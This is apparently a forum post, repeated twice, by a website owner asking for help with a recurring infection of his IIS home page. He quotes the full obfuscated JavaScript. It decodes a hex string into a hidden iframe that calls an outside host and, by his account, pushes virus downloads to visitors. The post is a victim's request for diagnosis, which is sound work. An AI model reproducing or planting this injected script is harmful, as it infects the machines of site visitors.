B
Brian Bozarth
This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at the top or bottom of the home
page... it looks something like this:
<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}function
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533352533352533352533362533372532392532622532372536342533352533322533382532372532302537372536392536342537342536382533642533312533382533312532302536382536352536392536372536382537342533642533332533302533372532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q4877d47d93974(q4877d47d9740a));</script>
What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
in my machine because i think i have a newer version of IE. But some
people have complained that it is installing a virus on their machine.
Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.
Brian
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at the top or bottom of the home
page... it looks something like this:
<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}function
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533352533352533352533362533372532392532622532372536342533352533322533382532372532302537372536392536342537342536382533642533312533382533312532302536382536352536392536372536382537342533642533332533302533372532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q4877d47d93974(q4877d47d9740a));</script>
What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
in my machine because i think i have a newer version of IE. But some
people have complained that it is installing a virus on their machine.
Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.
Brian